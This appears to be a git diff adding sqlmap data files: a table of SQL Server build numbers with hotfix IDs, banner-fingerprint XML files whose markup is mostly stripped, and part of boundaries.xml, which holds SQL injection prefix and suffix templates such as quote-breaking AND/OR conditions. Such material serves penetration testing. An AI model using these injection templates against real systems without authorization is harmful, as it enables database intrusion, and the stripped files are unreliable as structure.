3+Q978791 + + + + + 9.00.4273 + + + 3+Q976951 + + + + + 9.00.4266 + + + 3+Q974648 + + + + + 9.00.4230 + + + 3+Q972511 + + + + + 9.00.4226 + + + 3+Q970279 + + + + + 9.00.4224 + + + 3+Q971409 + + + + + 9.00.4220 + + + 3+Q967909 + + + + + 9.00.4216 + + + 3+Q967101 + + + + + 9.00.4211 + + + 3+Q961930 + + + + + 9.00.4207 + + + 3+Q959195 + + + + + 9.00.4053 + + + 3 + + + + + 9.00.4035 + + + 3 + + + + + 9.00.3356 + + + 2+Cumulative Update 17 + + + + + 9.00.3355 + + + 2+Q216793 + + + + + 9.00.3330 + + + 2+Q972510 + + + + + 9.00.3328 + + + 2+Q970278 + + + + + 9.00.3327 + + + 2+Q948567 + + + + + 9.00.3325 + + + 2+Q967908 + + + + + 9.00.3320 + + + 2+Q969142 + + + + + 9.00.3318 + + + 2+Q967199 + + + + + 9.00.3315 + + + 2+Q962970 + + + + + 9.00.3310 + + + 2+Q960090 + + + + + 9.00.3303 + + + 2+Q962209 + + + + + 9.00.3302 + + + 2+Q961479 + + + + + 9.00.3301 + + + 2+Q958735 + + + + + 9.00.3295 + + + 2+Q959132 + + + + + 9.00.3294 + + + 2+Q956854 + + + + + 9.00.3291 + + + 2+Q956889 + + + + + 9.00.3289 + + + 2+Q937137 + + + + + 9.00.3282 + + + 2+Q953752 + + + + + 9.00.3261 + + + 2+Q955754 + + + + + 9.00.3260 + + + 2+Q954950 + + + + + 9.00.3259 + + + 2+Q954669 + + + + + 9.00.3257 + + + 2+Q951217 + + + + + 9.00.3253 + + + 2+Q954054 + + + + + 9.00.3244 + + + 2+Q952330 + + + + + 9.00.3242 + + + 2+Q951190 + + + + + 9.00.3240 + + + 2+Q951204 + + + + + 9.00.3239 + + + 2+Q949095 + + + + + 9.00.3235 + + + 2+Q950189 + + + + + 9.00.3232 + + + 2+Q949959 + + + + + 9.00.3231 + + + 2+Q949687 + + + + + 9.00.3230 + + + 2+Q949199 + + + + + 9.00.3228 + + + 2+Q946608 + + + + + 9.00.3224 + + + 2+Q947463 + + + + + 9.00.3222 + + + 2+Q945640 + + + + + 9.00.3221 + + + 2+Q942908 + + + + + 9.00.3215 + + + 2+Q941450 + + + + + 9.00.3209 + + + 2 + + + + + 9.00.3208 + + + 2+Q944902 + + + + + 9.00.3206 + + + 2+Q944677 + + + + + 9.00.3205 + + + 2 + + + + + 9.00.3203 + + + 2 + + + + + 9.00.3200 + + + 2+Q941450 + + + + + 9.00.3195 + + + 2 + + + + + 9.00.3194 + + + 2+Q940933 + + + + + 9.00.3186 + + + 2+Q939562 + + + + + 9.00.3182 + + + 2+Q940128 + + + + + 9.00.3180 + + + 2+Q939942 + + + + + 9.00.3179 + + + 2+Q938243 + + + + + 9.00.3178 + + + 2 + + + + + 9.00.3177 + + + 2+Q939563 + + + + + 9.00.3175 + + + 2+Q936305 + + + + + 9.00.3171 + + + 2+Q937745 + + + + + 9.00.3169 + + + 2+Q937041 + + + + + 9.00.3166 + + + 2+Q936185 + + + + + 9.00.3162 + + + 2+Q932610 + + + + + 9.00.3161 + + + 2+Q935356 + + + + + 9.00.3159 + + + 2+Q934459 + + + + + 9.00.3156 + + + 2+Q934226 + + + + + 9.00.3155 + + + 2+Q933549 + + + + + 9.00.3154 + + + 2+Q934106 + + + + + 9.00.3153 + + + 2+Q933564 + + + + + 9.00.3152 + + + 2+Q933097 + + + + + 9.00.3080 + + + 2+Q970895 + + + + + 9.00.3077 + + + 2+Q960089 + + + + + 9.00.3073 + + + 2+Q954606 + + + + + 9.00.3054 + + + 2+Q934458 + + + + + 9.00.3050 + + + 2+Q933508 + + + + + 9.00.3043 + + + 2+Q933508 + + + + + 9.00.3042 + + + 'Fixed' 2 + + + + + 9.00.3033 + + + 2 CTP + + + + + 9.00.3027 + + + 2 CTP + + + + + 9.00.3026 + + + 1+Q929376 + + + + + 9.00.2249 + + + 1+Q948344 + + + + + 9.00.2245 + + + 1+Q933573 + + + + + 9.00.2243 + + + 1+Q944968 + + + + + 9.00.2242 + + + 1+Q943389 + + + + + 9.00.2239 + + + 1+Q940961 + + + + + 9.00.2237 + + + 1+Q940719 + + + + + 9.00.2236 + + + 1+Q940287 + + + + + 9.00.2234 + + + 1+Q937343 + + + + + 9.00.2233 + + + 1+Q933499 + + + + + 9.00.2232 + + + 1+Q937277 + + + + + 9.00.2231 + + + 1+Q934812 + + + + + 9.00.2230 + + + 1+Q936179 + + + + + 9.00.2229 + + + 1+Q935446 + + + + + 9.00.2227 + + + 1+Q934066 + + + + + 9.00.2226 + + + 1+Q933762 + + + + + 9.00.2224 + + + 1+Q932990 + + + + + 9.00.2223 + + + 1+Q932393 + + + + + 9.00.2221 + + + 1+Q931593 + + + + + 9.00.2219 + + + 1+Q931329 + + + + + 9.00.2218 + + + 1+Q931843 + + + + + 9.00.2216 + + + 1+Q931821 + + + + + 9.00.2215 + + + 1+Q931666 + + + + + 9.00.2214 + + + 1+Q929240 + + + + + 9.00.2211 + + + 1+Q930283 + + + + + 9.00.2209 + + + 1+Q929278 + + + + + 9.00.2208 + + + 1+Q929179 + + + + + 9.00.2207 + + + 1+Q928394< + + + + + 9.00.2206 + + + 1+Q928539 + + + + + 9.00.2202 + + + 1+Q927643 + + + + + 9.00.2201 + + + 1+Q927289 + + + + + 9.00.2198 + + + 1+Q926773 + + + + + 9.00.2196 + + + 1+Q926285 + + + + + 9.00.2195 + + + 1+Q926240 + + + + + 9.00.2194 + + + 1+Q925744 + + + + + 9.00.2192 + + + 1+Q924954 + + + + + 9.00.2191 + + + 1+Q925135 + + + + + 9.00.2190 + + + 1+Q925227 + + + + + 9.00.2189 + + + 1+Q925153 + + + + + 9.00.2187 + + + 1+Q923849 + + + + + 9.00.2183 + + + 1+Q929404 + + + + + 9.00.2181 + + + 1+Q923624 + + + + + 9.00.2176 + + + 1+Q923296 + + + + + 9.00.2175 + + + 1+Q922578 + + + + + 9.00.2174 + + + 1+Q922063 + + + + + 9.00.2167 + + + 1+Q920974 + + + + + 9.00.2164 + + + 1+Q919636 + + + + + 9.00.2156 + + + 1+Q919611 + + + + + 9.00.2153 + + + 1+builds 1531 + + + + + 9.00.2050 + + + 1+.NET Vulnerability fix + + + + + 9.00.2047 + + + 1 0 + + + + + 9.00.2040 + + + 1 CTP + + + + + 9.00.2029 + + + 1 Beta + + + + + 9.00.1561 + + + 0+Q932556 + + + + + 9.00.1558 + + + 0+Q926493 + + + + + 9.00.1554 + + + 0+Q926292 + + + + + 9.00.1551 + + + 0+Q922804 + + + + + 9.00.1550 + + + 0+Q917887 + + + + + 9.00.1547 + + + 0+Q918276 + + + + + 9.00.1545 + + + 0+Q917905 + + + + + 9.00.1541 + + + 0+Q917888 + + + + + 9.00.1539 + + + 0+Q917738 + + + + + 9.00.1538 + + + 0+Q917824 + + + + + 9.00.1536 + + + 0+Q917016 + + + + + 9.00.1534 + + + 0+Q916706 + + + + + 9.00.1533 + + + 0+Q916086 + + + + + 9.00.1532 + + + 0+Q916046 + + + + + 9.00.1531 + + + 0+Q915918 + + + + + 9.00.1528 + + + 0+Q915112 + + + + + 9.00.1519 + + + 0+Q913494 + + + + + 9.00.1518 + + + 0+Q912472 + + + + + 9.00.1514 + + + 0+Q912471 + + + + + 9.00.1503 + + + 0+Q911662 + + + + + 9.00.1502 + + + 0+Q915793 + + + + + 9.00.1500 + + + 0+Q910416 + + + + + 9.00.1406 + + + 0+Q932557 + + + + + 9.00.1399 + + + 0 + + + + + 9.00.1314 + + + September CTP Release + + + + + 9.00.1187 + + + June CTP Release + + + + + 9.00.1116 + + + April CTP Release + + + + + 9.00.1090 + + + March CTP Release + + + + + 9.00.981 + + + December CTP Release + + + + + 9.00.951 + + + October CTP Release + + + + + 9.00.917 + + + Internal build + + + + + 9.00.852 + + + Beta 2 + + + + + 9.00.849 + + + Internal build + + + + + 9.00.844 + + + Internal build + + + + + 9.00.836 + + + Express Ed. Tech Preview + + + + + 9.00.823 + + + Internal build + + + + + 9.00.790 + + + Internal build + + + + + 9.00.767 + + + Internal build + + + + + 9.00.747 + + + Internal build + + + + + 9.00.645 + + + MS Internal + + + + + 9.00.608 + + + Beta 1 + + + + + + + 7.00.1152 + + + 4+Q941203 + + + + + 7.00.1150 + + + 4+Q891116 + + + + + 7.00.1144 + + + 4+Q830233 + + + + + 7.00.1143 + + + 4+Q829015 + + + + + 7.00.1097 + + + 4+Q822756 + + + + + 7.00.1094 + + + 4+Q815495 + + + + + 7.00.1079 + + + 329499 + + + + + 7.00.1078 + + + 4+Q327068 + + + + + 7.00.1077 + + + 4+Q316333 + + + + + 7.00.1063 + + + 4 + + + + + 7.00.1033 + + + 3+Q324469 + + + + + 7.00.1026 + + + 3+Q319851 + + + + + 7.00.1004 + + + 3+Q304851 + + + + + 7.00.996 + + + 3+Q299717 + + + + + 7.00.978 + + + 3+Q285870 + + + + + 7.00.977 + + + 3+Q284351 + + + + + 7.00.970 + + + 3+Q283837 + + + + + 7.00.961 + + + 3 + + + + + 7.00.921 + + + 2+Q283837 + + + + + 7.00.919 + + + 2+Q282243 + + + + + 7.00.918 + + + 2+Q280380 + + + + + 7.00.917 + + + 2+Q279180 + + + + + 7.00.910 + + + 2+Q275901 + + + + + 7.00.905 + + + 2+Q274266 + + + + + 7.00.889 + + + 2+Q243741 + + + + + 7.00.879 + + + 2+Q281185 + + + + + 7.00.857 + + + 2+Q260346 + + + + + 7.00.842 + + + 2 + + + + + 7.00.839 + + + 2 Unidentified + + + + + 7.00.835 + + + 2 Beta + + + + + 7.00.776 + + + 1+Q258087 + + + + + 7.00.770 + + + 1+Q252905 + + + + + 7.00.745 + + + 1+Q253738 + + + + + 7.00.722 + + + 1+Q239458 + + + + + 7.00.699 + + + 1 + + + + + 7.00.689 + + + 1 Beta + + + + + 7.00.677 + + + MSDE O2K Dev + + + + + 7.00.662 + + + Gold+Q232707 + + + + + 7.00.658 + + + Gold+Q244763 + + + + + 7.00.657 + + + Gold+Q229875 + + + + + 7.00.643 + + + Gold+Q220156 + + + + + 7.00.623 + + + Gold + + + + + 7.00.583 + + + RC1 + + + + + 7.00.517 + + + Beta 3 + + + + + + + 8.00.2283 + + + 4+Q971524 + + + + + 8.00.2279 + + + 4+Q959678 + + + + + 8.00.2271 + + + 4+Q946584 + + + + + 8.00.2265 + + + 4+Q944985 + + + + + 8.00.2253 + + + 4+Q939317 + + + + + 8.00.2249 + + + 4+Q936232 + + + + + 8.00.2248 + + + 4+Q935950 + + + + + 8.00.2246 + + + 4+Q935465 + + + + + 8.00.2245 + + + 4+Q933573 + + + + + 8.00.2244 + + + 4+Q934203 + + + + + 8.00.2242 + + + 4+Q929131 + + + + + 8.00.2238 + + + 4+Q931932 + + + + + 8.00.2234 + + + 4+Q929440 + + + + + 8.00.2232 + + + 4+Q928568 + + + + + 8.00.2231 + + + 4+Q928079 + + + + + 8.00.2229 + + + 4+Q927186 + + + + + 8.00.2226 + + + 4+Q925684 + + + + + 8.00.2223 + + + 4+Q925678 + + + + + 8.00.2218 + + + 4+Q925297 + + + + + 8.00.2217 + + + 4+Q924664 + + + + + 8.00.2215 + + + 4+Q924662 + + + + + 8.00.2209 + + + 4+Q923797 + + + + + 8.00.2207 + + + 4+Q923344 + + + + + 8.00.2201 + + + 4+Q920930 + + + + + 8.00.2199 + + + 4+Q919221 + + + + + 8.00.2197 + + + 4+Q919133 + + + + + 8.00.2196 + + + 4+Q919165 + + + + + 8.00.2194 + + + 4+Q917972 + + + + + 8.00.2192 + + + 4+Q917606 + + + + + 8.00.2191 + + + 4+Q916698 + + + + + 8.00.2189 + + + 4+Q916652 + + + + + 8.00.2187 + + + 4+916287 + + + + + 8.00.2180 + + + 4+Q913684 + + + + + 8.00.2175 + + + 4+Q911678 + + + + + 8.00.2172 + + + 4+Q910707 + + + + + 8.00.2171 + + + 4+Q909369 + + + + + 8.00.2168 + + + 4+Q907813 + + + + + 8.00.2167 + + + 4+Q921293 + + + + + 8.00.2166 + + + 4+Q909734 + + + + + 8.00.2162 + + + 4+Q904660 + + + + + 8.00.2156 + + + 4+Q906790 + + + + + 8.00.2151 + + + 4+Q903742 + + + + + 8.00.2148 + + + 4+Q899430 + + + + + 8.00.2147 + + + 4+Q899410 + + + + + 8.00.2145 + + + 4+Q826906 + + + + + 8.00.2055 + + + 4+Q959420 + + + + + 8.00.2040 + + + 4+Q899761 + + + + + 8.00.2039 + + + 4 + + + + + 8.00.2026 + + + 4 Beta + + + + + 8.00.1547 + + + 3+Q899410 + + + + + 8.00.1037 + + + 3+Q930484 + + + + + 8.00.1036 + + + 3+Q929410 + + + + + 8.00.1035 + + + 3+Q917593 + + + + + 8.00.1034 + + + 3+Q915328 + + + + + 8.00.1029 + + + 3+Q902852 + + + + + 8.00.1027 + + + 3+Q900416 + + + + + 8.00.1025 + + + 3+Q899428 + + + + + 8.00.1024 + + + 3+Q898709 + + + + + 8.00.1021 + + + 3+Q887700 + + + + + 8.00.1020 + + + 3+Q896985 + + + + + 8.00.1019 + + + 3+Q897572 + + + + + 8.00.1017 + + + 3+Q896425 + + + + + 8.00.1014 + + + 3+Q895123 + + + + + 8.00.1013 + + + 3+Q891866 + + + + + 8.00.1009 + + + 3+Q894257 + + + + + 8.00.1007 + + + 3+Q893312 + + + + + 8.00.1000 + + + 3+Q891585 + + + + + 8.00.997 + + + 3+Q891311 + + + + + 8.00.996 + + + 3+Q891017 + + + + + 8.00.994 + + + 3+Q890942 + + + + + 8.00.993 + + + 3+Q890925 + + + + + 8.00.991 + + + 3+Q889314 + + + + + 8.00.990 + + + 3+Q890200 + + + + + 8.00.988 + + + 3+Q889166 + + + + + 8.00.985 + + + 3+Q889239 + + + + + 8.00.980 + + + 3+Q887974 + + + + + 8.00.977 + + + 3+Q888007 + + + + + 8.00.973 + + + 3+Q884554 + + + + + 8.00.972 + + + 3+Q885290 + + + + + 8.00.970 + + + 3+Q872842 + + + + + 8.00.967 + + + 3+Q878501 + + + + + 8.00.962 + + + 3+Q883415 + + + + + 8.00.961 + + + 3+Q873446 + + + + + 8.00.959 + + + 3+Q878500 + + + + + 8.00.957 + + + 3+Q870994 + + + + + 8.00.955 + + + 3+Q867798 + + + + + 8.00.954 + + + 3+Q843282 + + + + + 8.00.952 + + + 3+Q867878 + + + + + 8.00.944 + + + 3+Q839280 + + + + + 8.00.937 + + + 3+Q841776 + + + + + 8.00.936 + + + 3+Q841627 + + + + + 8.00.935 + + + 3+Q841401 + + + + + 8.00.934 + + + 3+Q841404 + + + + + 8.00.933 + + + 3+Q840856 + + + + + 8.00.929 + + + 3+Q839529 + + + + + 8.00.928 + + + 3+Q839589 + + + + + 8.00.927 + + + 3+Q839688 + + + + + 8.00.926 + + + 3+Q839523 + + + + + 8.00.923 + + + 3+Q838460 + + + + + 8.00.922 + + + 3+Q837970 + + + + + 8.00.919 + + + 3+Q837957 + + + + + 8.00.916 + + + 3+Q317989 + + + + + 8.00.915 + + + 3+Q837401 + + + + + 8.00.913 + + + 3+Q836651 + + + + + 8.00.911 + + + 3+Q837957 + + + + + 8.00.910 + + + 3+Q834798 + + + + + 8.00.908 + + + 3+Q834290 + + + + + 8.00.904 + + + 3+Q834453 + + + + + 8.00.892 + + + 3+Q833710 + + + + + 8.00.891 + + + 3+Q836141 + + + + + 8.00.879 + + + 3+Q832977 + + + + + 8.00.878 + + + 3+Q831950 + + + + + 8.00.876 + + + 3+Q830912 + + + + + 8.00.873 + + + 3+Q830887 + + + + + 8.00.871 + + + 3+Q830767 + + + + + 8.00.870 + + + 3+Q830262 + + + + + 8.00.869 + + + 3+Q830588 + + + + + 8.00.867 + + + 3+Q830366 + + + + + 8.00.866 + + + 3+Q830366 + + + + + 8.00.865 + + + 3+Q830395 + + + + + 8.00.863 + + + 3+Q829205 + + + + + 8.00.859 + + + 3+Q821334 + + + + + 8.00.858 + + + 3+Q828637 + + + + + 8.00.857 + + + 3+Q828017 + + + + + 8.00.856 + + + 3+Q828096 + + + + + 8.00.854 + + + 3+Q828699 + + + + + 8.00.852 + + + 3+Q830466 + + + + + 8.00.851 + + + 3+Q826754 + + + + + 8.00.850 + + + 3+Q826860 + + + + + 8.00.848 + + + 3+Q826822 + + + + + 8.00.847 + + + 3+Q826433 + + + + + 8.00.845 + + + 3+Q826364 + + + + + 8.00.844 + + + 3+Q826080 + + + + + 8.00.842 + + + 3+Q825043 + + + + + 8.00.841 + + + 3+Q825225 + + + + + 8.00.840 + + + 3+Q319477 + + + + + 8.00.839 + + + 3+Q823877 + + + + + 8.00.837 + + + 3+Q821741 + + + + + 8.00.819 + + + 3+Q826161 + + + + + 8.00.818 + + + 3+Q821277 + + + + + 8.00.816 + + + 3+Q818766 + + + + + 8.00.814 + + + 3+Q819662 + + + + + 8.00.811 + + + 3+Q819248 + + + + + 8.00.807 + + + 3+Q818899 + + + + + 8.00.804 + + + 3+Q818729 + + + + + 8.00.801 + + + 3+Q818540 + + + + + 8.00.800 + + + 3+Q818414 + + + + + 8.00.798 + + + 3+Q817464 + + + + + 8.00.794 + + + 3+Q817464 + + + + + 8.00.791 + + + 3+Q815249 + + + + + 8.00.790 + + + 3+Q817081 + + + + + 8.00.789 + + + 3+Q816840 + + + + + 8.00.788 + + + 3+Q816985 + + + + + 8.00.781 + + + 3+Q815057 + + + + + 8.00.780 + + + 3+Q816084 + + + + + 8.00.779 + + + 3+Q814035 + + + + + 8.00.776 + + + 3+Unidentified + + + + + 8.00.775 + + + 3+Q815115 + + + + + 8.00.769 + + + 3+Q814889 + + + + + 8.00.765 + + + < + + + + + 8.00.763 + + + 3+Q814113 + + + + + 8.00.762 + + + 3+Q814032 + + + + + 8.00.760 + + + 3 + + + + + 8.00.743 + + + 2+Q818406 + + + + + 8.00.741 + + + 2+Q818096 + + + + + 8.00.736 + + + 2+Q816937 + + + + + 8.00.735 + + + 2+Q814889 + + + + + 8.00.733 + + + 2+Q813759 + + + + + 8.00.730 + + + 2+Q813769 + + + + + 8.00.728 + + + 2+Q814460 + + + + + 8.00.725 + + + 2+Q812995 + + + + + 8.00.723 + + + 2+Q812798 + + + + + 8.00.721 + + + 2+Q812250 + + + + + 8.00.718 + + + 2+Q811703 + + + + + 8.00.715 + + + 2+Q810688 + + + + + 8.00.714 + + + 2+Q811478 + + + + + 8.00.713 + + + 2 + + + + + 8.00.710 + + + 2 + + + + + 8.00.705 + + + 2+Q810920 + + + + + 8.00.703 + + + 2+Q810526 + + + + + 8.00.702 + + + 2+Q328551 + + + + + 8.00.701 + + + 2+Q810026 + + + + + 8.00.700 + + + 2+Q810072 + + + + + 8.00.696 + + + 2+Q810052 + + + + + 8.00.695 + + + 2+Q331885 + + + + + 8.00.693 + + + 2+Q330212 + + + + + 8.00.689 + + + 2+Q329499 + + + + + 8.00.688 + + + 2+Q329487 + + + + + 8.00.686 + + + 2+Q316333 + + + + + 8.00.682 + + + 3+Q319851 + + + + + 8.00.679 + + + 2+Q316333 + + + + + 8.00.678 + + + 2+Q328354 + + + + + 8.00.667 + + + 2+8 + + + + + 8.00.665 + + + 2+8 + + + + + 8.00.661 + + + 2+Q326999 + + + + + 8.00.655 + + + 2+7 + + + + + 8.00.652 + + + 2+Q810010? + + + + + 8.00.650 + + + 2+Q322853 + + + + + 8.00.644 + + + 2+Q324186 + + + + + 8.00.608 + + + 2+Q319507 + + + + + 8.00.604 + + + 2+3 + + + + + 8.00.594 + + + 2+Q319477 + + + + + 8.00.578 + + + 2+Q317979 + + + + + 8.00.561 + + + 2+1 + + + + + 8.00.558 + + + 2+Q314003 + + + + + 8.00.552 + + + 2+Q313002 + + + + + 8.00.534 + + + 2.01 + + + + + 8.00.532 + + + 2 + + + + + 8.00.475 + + + 1+1 + + + + + 8.00.474 + + + 1+Q315395 + + + + + 8.00.473 + + + 1+Q314003 + + + + + 8.00.471 + + + 1+Q313302 + + + + + 8.00.469 + + + 1+Q313005 + + + + + 8.00.452 + + + 1+Q308547 + + + + + 8.00.444 + + + 1+Q307540 + + + + + 8.00.443 + + + 1+Q307538 + + + + + 8.00.428 + + + 1+Q304850 + + + + + 8.00.384 + + + 1 + + + + + 8.00.287 + + + 0+Q297209 + + + + + 8.00.251 + + + 0+Q300194 + + + + + 8.00.250 + + + 0+Q291683 + + + + + 8.00.249 + + + 0+Q288122 + + + + + 8.00.239 + + + 0+Q285290 + + + + + 8.00.233 + + + 0+Q282416 + + + + + 8.00.231 + + + 0+Q282279 + + + + + 8.00.226 + + + 0+Q278239 + + + + + 8.00.225 + + + 0+Q281663 + + + + + 8.00.223 + + + 0+Q280380 + + + + + 8.00.222 + + + 0+Q281769 + + + + + 8.00.218 + + + 0+Q279183 + + + + + 8.00.217 + + + 0+Q279293 + + + + + 8.00.211 + + + 0+Q276329 + + + + + 8.00.210 + + + 0+Q275900 + + + + + 8.00.205 + + + 0+Q274330 + + + + + 8.00.204 + + + 0+Q274329 + + + + + 8.00.194 + + + 0 + + + + + 8.00.190 + + + Gold, no + + + + + 8.00.100 + + + Beta 2 + + + + + 8.00.078 + + + EAP5 + + + + + 8.00.047 + + + EAP4 + + + + diff --git a/src/sqlmap-master/data/xml/banner/mysql.xml b/src/sqlmap-master/data/xml/banner/mysql.xml new file mode 100644 index 0000000..456c951 --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/mysql.xml @@ -0,0 +1,79 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/oracle.xml b/src/sqlmap-master/data/xml/banner/oracle.xml new file mode 100644 index 0000000..61ce994 --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/oracle.xml @@ -0,0 +1,7 @@ + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/postgresql.xml b/src/sqlmap-master/data/xml/banner/postgresql.xml new file mode 100644 index 0000000..7f03e8e --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/postgresql.xml @@ -0,0 +1,16 @@ + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/server.xml b/src/sqlmap-master/data/xml/banner/server.xml new file mode 100644 index 0000000..4d99cad --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/server.xml @@ -0,0 +1,943 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/servlet-engine.xml b/src/sqlmap-master/data/xml/banner/servlet-engine.xml new file mode 100644 index 0000000..c34d961 --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/servlet-engine.xml @@ -0,0 +1,29 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/set-cookie.xml b/src/sqlmap-master/data/xml/banner/set-cookie.xml new file mode 100644 index 0000000..a9d8143 --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/set-cookie.xml @@ -0,0 +1,65 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/sharepoint.xml b/src/sqlmap-master/data/xml/banner/sharepoint.xml new file mode 100644 index 0000000..fe3f7b7 --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/sharepoint.xml @@ -0,0 +1,9 @@ + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/x-aspnet-version.xml b/src/sqlmap-master/data/xml/banner/x-aspnet-version.xml new file mode 100644 index 0000000..5cabdc4 --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/x-aspnet-version.xml @@ -0,0 +1,9 @@ + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/banner/x-powered-by.xml b/src/sqlmap-master/data/xml/banner/x-powered-by.xml new file mode 100644 index 0000000..34ad03d --- /dev/null +++ b/src/sqlmap-master/data/xml/banner/x-powered-by.xml @@ -0,0 +1,65 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/sqlmap-master/data/xml/boundaries.xml b/src/sqlmap-master/data/xml/boundaries.xml new file mode 100644 index 0000000..20bf0d1 --- /dev/null +++ b/src/sqlmap-master/data/xml/boundaries.xml @@ -0,0 +1,576 @@ + + + + + + + + 3 + 1 + 1,2 + 1 + ) + [GENERIC_SQL_COMMENT] + + + + 4 + 1 + 1,2 + 2 + ') + [GENERIC_SQL_COMMENT] + + + + 3 + 1,2,3 + 1,2 + 2 + ' + [GENERIC_SQL_COMMENT] + + + + 5 + 1 + 1,2 + 4 + " + [GENERIC_SQL_COMMENT] + + + + + + 1 + 1 + 1,2 + 1 + ) + AND ([RANDNUM]=[RANDNUM] + + + + 2 + 1 + 1,2 + 1 + )) + AND (([RANDNUM]=[RANDNUM] + + + + 3 + 1 + 1,2 + 1 + ))) + AND ((([RANDNUM]=[RANDNUM] + + + + 1 + 0 + 1,2,3 + 1 + + + + + + 1 + 1 + 1,2 + 2 + ') + AND ('[RANDSTR]'='[RANDSTR] + + + + 2 + 1 + 1,2 + 2 + ')) + AND (('[RANDSTR]'='[RANDSTR] + + + + 3 + 1 + 1,2 + 2 + '))) + AND ((('[RANDSTR]'='[RANDSTR] + + + + 1 + 1 + 1,2 + 2 + ' + AND '[RANDSTR]'='[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + ') + AND ('[RANDSTR]' LIKE '[RANDSTR] + + + + 3 + 1 + 1,2 + 3 + ')) + AND (('[RANDSTR]' LIKE '[RANDSTR] + + + + 4 + 1 + 1,2 + 3 + '))) + AND ((('[RANDSTR]' LIKE '[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + %' + AND '[RANDSTR]%'='[RANDSTR] + + + + 2 + 1 + 1,2 + 3 + ' + AND '[RANDSTR]' LIKE '[RANDSTR] + + + + 2 + 1 + 1,2 + 4 + ") + AND ("[RANDSTR]"="[RANDSTR] + + + + 3 + 1 + 1,2 + 4 + ")) + AND (("[RANDSTR]"="[RANDSTR] + + + + 4 + 1 + 1,2 + 4 + "))) + AND ((("[RANDSTR]"="[RANDSTR] + + + + 2 + 1 + 1,2 + 4 + " + AND "[RANDSTR]"="[RANDSTR] + + + + 3 + 1 + 1,2 + 5 + ") + AND ("[RANDSTR]" LIKE "[RANDSTR] + + + + 4 + 1 + 1,2 + 5 + ")) + AND (("[RANDSTR]" LIKE "[RANDSTR] + + + + 5 + 1 + 1,2 + 5 + "))) + AND ((("[RANDSTR]" LIKE "[RANDSTR] + + + + 3 + 1 + 1,2 + 5 + " + AND "[RANDSTR]" LIKE "[RANDSTR] + + + + 1 + 1 + 1,2 + 1 + + [GENERIC_SQL_COMMENT] + + + + 3 + 1 + 1,2 + 1 + + # [RANDSTR] + + + + + 3 + 1 + 1,2 + 2 + ' + OR '[RANDSTR1]'='[RANDSTR2] + + + + + + 5 + 9 + 1,2 + 2 + ') WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1,2 + 2 + ") WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 1 + ) WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 2 + ' WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1,2 + 4 + " WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 4 + 9 + 1,2 + 1 + WHERE [RANDNUM]=[RANDNUM] + [GENERIC_SQL_COMMENT] + + + + 5 + 9 + 1 + 2 + '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] + )||' + + + + 5 + 9 + 1 + 2 + '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] + )||' + + + + 5 + 9 + 1 + 2 + 